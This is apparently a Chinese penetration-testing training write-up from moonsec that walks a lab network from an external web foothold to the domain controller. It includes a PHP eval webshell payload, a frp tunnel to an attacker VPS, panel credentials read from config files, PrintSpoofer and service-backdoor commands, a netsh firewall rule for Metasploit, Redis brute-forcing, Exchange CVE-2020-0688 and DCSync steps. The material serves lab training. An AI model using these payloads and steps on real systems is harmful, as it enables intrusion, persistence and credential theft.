暗月实战项目十一
从外网打点到内网域实战cncat
moonsec
1.概述1
2.靶场搭建2
3.外网打点5
3.1.SQLMAP注入得到账号和密码5
3.2.修改配置文件拿webshell6
3.3.提权宝塔系统6
3.4.frp反向代理突破登录9
4.内网渗透10
4.1.主机信息收集11
4.2.横向渗透11
4.3.跨网段扫描12
4.4.hydra爆破redis12
4.5.rediswindows写shell12
4.6.answrod连接shell13
4.7.信息收集redis服务器信息14
4.8.PrintSpoofer提权server
4.9.下载metasploist正向后门收集信息15
4.10.设置服务方式启动后门15
4.11.设置windwos防火墙开放8899端口15
4.12.metasploit正向连接后门16
4.13.outlook查看邮件18
5.跨网段内网渗透18
5.1.CVE-2020-0688攻击exchange20
5.2.获取dc下的root21
5.3.通过smbexec登录域控22
概述
1
暗月实战项目十一是从外网打点到内网再到域控,是三层网络,目标是反向代理到内网访问,通过这个WEB点的信息获取源码,再到审计突破,再到内网。到了内网通过横向移动发现更多主机,通过信息整理得到工作组边界设备的权限,再通过exchange漏洞获取核心区域访问权限,再拿下域控权限。
主要技术应用:
基础的php代码审计、win系统的宝塔系统提权、cs或者msf实战渗透环境(vps一台)、shellcode免杀过火绒、内网漫游、三层网络、redis windows写shell
windwos防火墙配置(主要是会开端口和端口转发)、代理隧道应用,exchange漏洞命令执行,打域控技巧。
靶场搭建
2
12server-bt和12server-redis是nat模式。
外网准备一台vps系统可以是win也可以是linux要装有frp服务
在12server-bt配置frp
[common]
server_addr=你的vpsIP
server_port= 7788
token=moonsec9999
[web]
type= tcp
local_ip= 127.0.0.1
local_port= 80
remote_port= 80
绑定hosts
C:\Windows\System32\drivers\etc\hosts
外网打点
3
3.1 SQLMAP注入得到账号和密码
破解得moon@123
3.2 修改配置文件拿webshell
moo);eval($_POST[cmd]);//
3.3 提权宝塔系统
禁用函数
查看配置文件获取密码
宝塔的登录密码C:/BtSoft/panel/data/default.pl jSKyFFdj
宝塔的登录端口C:/BtSoft/panel/data/port.pl8888
宝塔的登录网址路径C:/BtSoft/panel/data/admin_path.pl/e1VOsmtO
C:/BtSoft/panel/data/default.db
sqlite数据库打开即可
账号gOXZQjWA密码jSKyFFdj登录:8888/e1VOsmtO
扫描端口
只开放了22和80端口
查看本地开放端口
访问8888端口
能访问登录页面但是登录不了。
3.4 frp反向代理突破登录
当前站点是反向代理出去的,所以可以考虑能不能修改配置文件。
可以看到文件是能修改,所以当管理重新执行的时候,就能通过8888端口访问宝塔的系统的8888端口。
登录宝塔系统
这个后门还要过火绒的。随便找了以前那些资源生成了一个后门。然后在宝塔任务执行。
内网渗透
4
4.1主机信息收集
4.2 横向渗透
4.3 跨网段扫描
在session执行绑定静态路由
修改配置文件vi/etc/proxychains.conf
添加socks4 127.0.0.1 1080
代理nmap扫描
4.4 hydra爆破redis
4.5 redis windows写shell
访问shell
4.6 answrod连接shell
修改proxychanis.conf连接
4.7 信息收集redis服务器信息
发现存在两个段
当前权限也是很低
4.8 PrintSpoofer提权server2012
把PrintSpoofer上传到C:\ProgramData\
C:\ProgramData\moonsec.exe-i -c "whoami"
4.9 下载metasploist正向后门收集信息
因为reids主机是出不了网的所以要将后门放在宝塔上的80端口,同样也要过火绒。
4.10 设置服务方式启动后门
注意双引号转义
启动后门
moonsec.exe -i -c"net start\"server power\""
4.11 设置windwos防火墙开放8899端口
因为有防火墙拦截先添加一个8899端口
netshfirewall add portopening tcp 8899 msf
4.12 metasploit正向连接后门
启动后门
这里有一个bug连上之后个几分钟就自动退出了。所以连接后马上迁移进程防止失去连接。
扫描10段的主机发现存在201和209
4.13 outlook查看邮件
导出outlook文件C:\Users\Administrator\Documents\Outlook文件
跨网段内网渗透
5
添加路由
访问443端口是一个exchange
登录成功。
查看所有用户。
5.1 CVE-2020-0688 攻击exchange
下载后门文件到exchange
5.2 获取dc下的root
dcsync administrator获取hash
知道了密码就可以通过代理对域控进行命令执行了。这里有空再说了。
5.3 通过smbexec登录域控
培训
6
项目十一 cncat
已经录制好课程有配套的工具
欢迎加入暗月全栈渗透培训观看和学习
培训咨询
扫一扫添加好友
公众号